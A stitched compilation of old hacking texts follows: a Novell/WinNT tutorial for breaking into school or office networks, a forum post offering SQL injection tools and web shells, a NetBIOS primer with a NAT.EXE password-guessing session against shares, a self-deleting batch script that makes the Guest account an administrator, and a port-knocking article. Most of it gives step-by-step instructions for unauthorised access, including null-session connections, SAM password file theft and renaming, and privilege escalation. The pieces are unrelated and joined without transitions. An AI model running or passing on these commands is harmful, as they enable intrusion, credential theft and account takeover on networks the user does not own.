command, and the loop can be stopped by removing the "ping.bat" at the end of the file. If you
wanna have some fun, try typing in "net send [username] [message]" in the command prompt. If the
user is currently logged on, a message will appear on his screen. It's really funny if you can
see their monitor from where you are sitting if you type a crazy message like "You have just
been owned!!!". Be aware however that the person receiving the message will know what computer
the message has come from. Your computer name will be something crazy like LIB00123. Although
the user may not be able to tell exactly who sent the message (then again, if he's smart he
will), he can type in the computer name instead of the username and create a .bat file to spam
you to hell.

Let's get back on track. It's time to show you how to create admin accounts in Novell if the OS
is winnt, assuming the Control Panel is disabled. Note however that this is easy to disable, but
most admins forget about it. Go into any folder and go to the help menu, the Help Topics.
Search anything related to users, passwords etc. You will then find a topic that contains a hyperlink
to "Users and Passwords". Click it. The crappy thing about winnt security is that when changing
a password, you don't have to know the old one! Anyway, once you either create a new account
or change the password on an existing account, restart the computer. When the logon screen
appears, type your login name and password. Now look around for a checkbox that says
"Workstation". Check it and press OK.

***Note: you will only have admin access on that particular computer. "Workstation" means that
you log onto an account on that workstation. If the checkbox isn't on the login screen, then you
cannot create admin accounts in this way. You will have to try certain programs described later
in the "Advanced Novell Hacking" section.

Lastly, I will show you how to access telnet. As you may have seen, most of my methods involve
DOS. Telnet is no different. In a DOS screen, type "telnet" and you will be taken to the Telnet
screen. From here try telnetting to the server and punch in a few commands to see what you can
do. Find out as much info as you can about what programs he's using and go online to look for
some tutorials.

Advanced Novell Hacking

This short section will discuss various advanced Novell hacking techniques. These involve using
programs such as port scanners, keyloggers, trojans and password crackers. I will also be looking
at File and Print Sharing (Legion V2.1, Sid2User - User2Sid, DumpSec), as well as some tips and
tricks with navigating around the network, including the "net use" command.

Firstly, let's look at various methods of hacking the network using specific programs. Although
this section may offend some people, it is nevertheless an essential part of Novell security. It
is an unfortunate fact that many people these days want to hack someone to be "cool" in the eyes
of their friends. These people have little or no morals, and almost always possess absolutely no
skill what so ever. All they care about is getting what they want, and they don't care how they
get it. Because of their lack of skill, these people usually rely solely on programs to do their
dirty work (if they don't have a friend who does it for them). If anybody like this is reading
this, I spit on you.

On the other hand, there are many skilled hackers out there who also turn to programs which
automate the process for a variety of reasons, usually because it is easier and usually more
effective to use programs.

As with any hack, there is one tool that you simply cannot live without. A port scanner. There
has been much debate over which port scanner is the best, what the pro's and con's of each
scanner are etc. Many say Nmap, but I often there's no need to waste time with such an advanced
scanner. The problem with Nmap is that it is too complicated for quick and easy use. Nmap is
good for home use, when you have a lot of time on your hands to try out various scans. In my
humble opinion, the best scanner for a Novell network is Angry IP Scanner by Angryziber
( Angry IP allows for lightning fast port scans on huge networks,
with great accuracy. It has some built in features like being able to establish connections over
HTTP, FTP and Telnet, as well as being able to Traceroute. It also has cool things like
"favourites" and being able to tell you many things about the target, such as Hostname, Comp.
Name, Group Name, User Name, MAC address and TTL. On top of all this, it can be used from the
command line! Anyway, it has many more features that you need to explore yourself. For now, all
we really need to be focussing on is its efficient simple port scanning features.

First of all, you will need to get the IP of some computers on your network. If you have been
reading this tutorial carefully instead of just skip to this section, you will remember that this
can be done using the netstat command in DOS (btw, if you still can't get DOS then you are really
dumb - no offence). You really only need one IP, because most, if not all of the IP's on the
network will have the same Network Number and Host Number. So, if you can see that your IP is, you should only scan IP's that have the same Network Number and Host Number. In
the case of the example, you would enter the start IP as and the end IP as First you should scan using only one port because you want to know exactly how
many computers you are potentially dealing with. If you put too many ports, you will be waiting
ages for your results if there are heaps of computers on the network. An alternative to this
would be to use the "net view" command.

C:\>net view

This displays all the computers connected to the network that you are currently on. This command
can be used to get further information about an individual machine by typing:

C:\>net view \\SOMECOMPUTER
Disk | share name

C:\>net view \\workgroup:TARGETWG (gives all computers in workgroup)
C:\>net view \\domain:TARGETD (gives all computers in domain)

Anyway, it would be best to specify the port as TCP 139, which you should all know as NetBIOS.
If this is open on any computers (and it damn well should be, you are on a network), you may be
able to get access to that computers hard drive. Go into DOS, and type in:

C:\>net use \\ADMINCOMPUTER\IPC$ "" /u:""

If you have even the slightest experience in hacking, you would have seen this command a
thousand times before. For those haven't, all you are doing is attempting to connect to computer
"ADMINCOMPUTER" using the inbuilt IPC$ share with a null password "" and an anonymous user
/u:"". If this doesn't work, you can try substituting the password for a wilcard * or even the
account, so you can have:


They all do the same thing, but sometimes only certain ones will work on certain machines. If
you are unlucky, you could try to substitute the IPC$ for ADMIN$ or C$. These are just
additional default shares. The difference between ADMIN$, C$ and IPC$ is that IPC$ cannot be
removed. This means that you should always be able to establish a connection. Of course, the
admin may want to create additional shares such as such as A$ (remote floppy drive), E$ (remote
CD drive) and really anything he wants. An admin can quite easily create and delete shares using
the "net share" command:

C:\>net share ADMIN$ /delete
Command completed successfully

This command deletes the remote administrator ADMIN$ share. Shares can be added by typing:

C:\>net share A$ a:
Command completed successfully.

This tells the computer to create a share A$ with the target to the a: drive.

I said earlier that it is possible to disconnect the a: drive from the network, thus enabling it
for our own usage. This can be done using the command:

C:\>net use a: /delete

Unfortunately, this command can be restricted by the administrator. Once it is, no command with
the prefix "net" will work. On the bright side, it is rare for an admin to realise that anybody
has been fucking with net use commands and establishing connections, yet alone disable the
command. If the command does get disabled, we are forced to turn to programs to do our dirty

Although there are a number of Netbios scanners, most of them are rather dated as these days few
hackers seriously rely on Netbios as their main weapon. Sure, it can be fun and rewarding, but
most computers these days have patches to guard against unauthorised access, or simply block
access to TCP 139 through their firewall or router. As a result, most people have stopped making
new Netbios programs. Because of this, most of the programs for Netbios are old. REALLY old.
We're talking old as in 1999 old. Sure, doesn't seem like that long ago, but in the computer
world, that is an eternity. Luckily for us, this is slightly different for networks. Because a
network has to be tied together very closely, it usually depends on port 139 to handle all the
traffic. As a result, most old programs will work like a charm. Although there are many, many
different programs you can use to try and get the shares, I recommend you use Legion V2.1 from
the now dead Rhino9 Security Group. It generally floats among internet sites.

Now let's take a quick look at the Security Accounts Manager (SAM). SAM is a way of storing
users details on the computer. It has usernames and password hashes inside, so it is very
important to keep safe from prying eyes. If you're the one with those eyes, SAM may just be your
goal. To cut the long story short, SAM cannot be accessed while anyone is logged onto that
computer. So what you have to do is restart it in DOS and try and copy it from there onto
floppy. The only problem with this is that sometimes SAM can be very big - a couple of Mb even
so floppy disk is an unlikely alternative. If the computer doesn't have a burner then it is
unlikely that you will be able to extract the hashes, so try and make the best of it any way you
can. Sometimes it's even possible to rename the SAM file by restarting in DOS and typing:

ren C:\winnt\repair\sam wateva

This will make the SAM file unreadable, so if the passwords are stored on the computer rather
than the server, they will all be useless. If this works, you will be able to log on without a
username or password. If you are able to extract the SAM file, there are many different password
crackers that you can use to take a peek at what's insisde. L0pht, Cain and Abel and many more
do a splendid job. Try them out and see what works for you.

Finally, I'll just show you one last thing that will freak the hell out of your admin if he ever
sees it. It is ridiculously easy to access the server on most networks and nobody even considers
this method. Simply create a shortcut to it!!! If you can find a way to find the hostname of
your server, all you have to do it right click, select new then click on shortcut. In the space
provided, type the hostname of the server. For example, if the server is called "server-1" then
in the shotcut type:


Then click next and that's it! You can double click on the shortcut and you will have access to
all the files on the server!!! As I said before, this will scare the hell out of any admin
because he wouldn't have thought of it himself and has definately not seen this before.
As for how much you can actually do - that depends entirely on the server. Most times
you will just browse but sometimes, who knows?

Lastly, we will take a quick look at the the SUBST command. The SUBST command associates
a path with a drive letter. This means it creates a virtual drive on top of an actual one. This can
be extremely handy when the administrator has blocked of say the C: drive from being viewed.
Often the admin simply restricts access to the C: drive by not showing the icon for the drive. If this
is the case simple open up a command prompt and type:

explorer c:

This will open explorer to the C: drive. Generally one will not be so lucky. The C: drive itself is
often restricted and trying to open explorer through command will tell us we don't have permission.
SUBST allows us to get passed this. Open up a command prompt and type in:

subst z: C:\

where z: is the virtual drive you wish to create and C:\ is the path of the drive you wish to view.
Now all you have to do is type...

explorer z:

...and an explorer window will pop up showing you the contents of C: but in the z: drive. You may
navigate this at will just as you would normally on an unrestricted computer. Although
useful, SUBST really only gives you a graphic interface since we may the entire contents of a
drive through command.

***Note: SUBST will also add the virtual drive to My Computer. If you have access to My Computer
you will see z: as well.

If you are having trouble with command because you cannot scroll up
whilst trying to use dir, try using dir /w or /p instead. Otherwise...

dir >> H:\dir.txt

...will send the results of the dir to a file called dir.txt (or will create the file if it does not already
exist) on the H: drive. Also note that on large networks net view can also be a pain, but using

net view >> H:\net.txt

we can see all the computers in a text file!



Hello everybody ,

since i started learning SQLi , i have collected lots of good tools and documents , m still collecting more and more day by day as my scope of knowledge is increasing .
So thought of sharing what i have collected till now with everyone here,
My tool pack includes the following things.


MD5 tools pack :


1) sqli scanner/automating injection pack :
contains 5 softwares for scanning ,and automating the hacking process

(a) Exploit scanner - for finding websites with dorks , and testing them for vulnerabilities.very famous
(b) Turkish ARTA - same as exploit scanner but not as famous bcos its turkish . i find it better then exploit scanner. but that my personal opinion
© Havij 1.12 free version : i guess everyone knows about it. it automates the process of performing sqli attack on any site.
it is extremely famous and efficient. but still it a tool :) nothing compared to manual process
(d) SQLI helper 2.7 : same like havij , but little fast .
(e)sqlinj Version 2 - another nice sql injection tool . i will write a tut later how to use this tool

2) ADMIN Finder pack :
After getting the logins from the database . one needs to get the admin finder page. for some sites its very easy while for smoe site its hellova tough
here are some nice admin finder tools and lists tht u may use. but these tools are never enough .i will keep uploaing the amin finder lists as i get more

(a)reiiuke admin finder ( u can upadt the original admin finder lists with the list i am providing)
(b)5 perl and python admin finder tools/scripts. update them as per ur need
© misc softwre : admin pass locater , to brute force admi pass if u cant find it


3) DORKS Pack : Contains many files contiaing more then 7000 dorks.

4) Shells : this pack contins many shells and source codes , like c99 ,c100 , jackel and hellova more
( many shells like c99 are identified as trojans by many antivirus. so u might find ur antivirus shouting about this pack. )
U might also wanna see this site :

5) MD5 cracking tools : although havij have md5 tool but for some reason it never worked for me . so this pack contains some tools .

6) SQLI tutorials pack : This pack contain complete html pages of sqli tutorails that i found useful from various forums and websites like hackforum , elitesoft ,warex , outlaws etc etc. i bet every newbe will love this pack .
u just need a firefox browser to open these html files.
NOTE: this pack also contain 2 of my own created sqli help files which i created myself, serves me as a very useful docment wheneever i m on to hack some site.

i will kep updating these packs as i learn and collect more and more .


Preface to NetBIOS

Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.

Whats is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.

NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.

It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.

NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.

PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.

All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.

NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.

In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.

NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.

When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:

1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.

2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.

3. If no other client on the network objects to the name registration, the client will finish the registration process.

There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.

The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.

[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]

The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.

Name Number Type Usage
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0

For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:

nbtstat -A [ipaddress]
nbtstat -a [host]

NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.

The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.

Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.

NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.


NetBIOS Attack Methods

This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist]


-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.

Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added, adds addresses
through, adds addresses through,7,10-20, adds addresses
through,, through
hostname,, adds "hostname" and
All combinations of hostnames and address ranges as
specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.

What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.

C:\nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
Network Monitor Name
Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domains database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Help with these commands

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.

[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.

[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:

Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

For this section, the command being used is the NET VIEW and NET USE commands.

[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.

C:\net view XXX.XX.XXX.XX

Shared resources at XXX.XX.XXX.XX

Share name Type Used as Comment

NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.

C:\net use /?

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]

NET USE [devicename | *] [password | *]] [/HOME]


C:\net use x: \\XXX.XX.XXX.XX\test

The command completed successfully.

C:\unzipped\nat10bin>net use

New connections will be remembered.

Status Local Remote Network

OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network

The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:

Server Comment
--------- -------

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.



echo off
title Please wait...
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...



Port Knocking

Port knocking is a clever new computer security trick. It's a way to configure a system so that only systems who know the "secret knock" can access a certain port. For example, you could build a port-knocking defensive system that would not accept any SSH connections (port 22) unless it detected connection attempts to closed ports 1026, 1027, 1029, 1034, 1026, 1044, and 1035 in that sequence within five seconds, then listened on port 22 for a connection within ten seconds. Otherwise, the system would completely ignore port 22.

It's a clever idea, and one that could easily be built into VPN systems and the like. Network administrators could create unique knocks for their networks -- family keys, really -- and only give them to authorized users. It's no substitute for good access control, but it's a nice addition. And it's an addition that's invisible to those who don't know about it.

Firewall administrators are challenged to balance flexibility and security when designing a comprehensive rule set. A firewall should provide protection against malfeasants, while allowing trusted users to connect. Unfortunately, it is not always possible to filter out the bad guys, because filtering on the basis of IP addresses and ports does not distinguish connecting users. Bad guys can and do come from trusted IP addresses. Open ports remain a necessary vulnerability: they allow connections to applications but also may turn into open doors for attack. This article presents a new security system, termed port knocking, in which trusted users manipulate firewall rules by transmitting information across closed ports.

Briefly, users make connection attempts to sequences of closed ports. The failed connections are logged by the server-side packet filtering firewall and detected by a dæmon that monitors the firewall log file. When a properly formatted knock sequence, playing the role of the secret used in the authentication, is received, firewall rules are manipulated based on the information content of the sequence. This user-based authentication system is both robust, being mediated by the kernel firewall, and stealthy--it's not possible to detect whether a networked machine is listening for port knocks. Port knocking does not require any open ports, and it can be extended to transmit any type of information encoded in a port sequence.

In commonly deployed firewalls, filtering is done either by the IP address of the connecting host or by the port to which this host is connecting. Firewalls examine and interact with packets before any user authentication takes place; therefore, they do not discriminate amongst the users making the connection. It is expected that once the firewall has approved the packet and allowed it to enter the network, downstream applications will handle user authentication. Normally, this provides a sufficient balance between protection and flexibility. Some IP ranges, say cracker-friendly Internet cafés, may be closed completely to incoming traffic, while hosts in other IP ranges may be allowed to connect to ports otherwise unavailable to the general public (proprietary/sensitive applications). Unfortunately, this type of IP-based filtering has the potential to lock out trusted users from your system. Flexibility is limited by the fact that nobody from the blocked IP ranges can connect, regardless of their trust statuses. At the same time, protection is undermined by the fact that anyone from the blocked IP range physically can travel and connect from an unfiltered host. In the end, as long as ports remain open, network applications are susceptible to attack. Using intrusion detection systems and keeping applications up to date can go a long way towards providing protection, but they do so against only known, derivative or anticipated attacks. To eliminate the risk associated with publically open ports, port knocking provides an authentication system that works across closed ports. The use of these ports, however, has to be subverted because all packets are denied. Fortunately, in most firewalls that perform even the most rudimentary logging, information already is flowing across closed ports in the form of entries in a log file indicating connection attempts. Consider the following example. A handful of ports (100-109) are configured to deny all traffic--no ICMP error packets are sent back to the connecting client--and all attempted connections are logged. In this example, the firewall IP is IPF and the connecting client IP is IPC. The appropriate ipchains command to close the ports and log connections is: ipchains -A input -p tcp -s 0/0 -d IPF/32 100:109 -j DENY -l
A user attempts to connect from IPC to the following firewall ports in sequence: 102,100,100,103. From the point of view of the user, the connections fail silently. On the firewall, though, the 102,100,100,103 number sequence has been recorded. Feb 12 00:13:26 ... input DENY eth1 PROTO=6 IPC:64137 IPF:102 ...
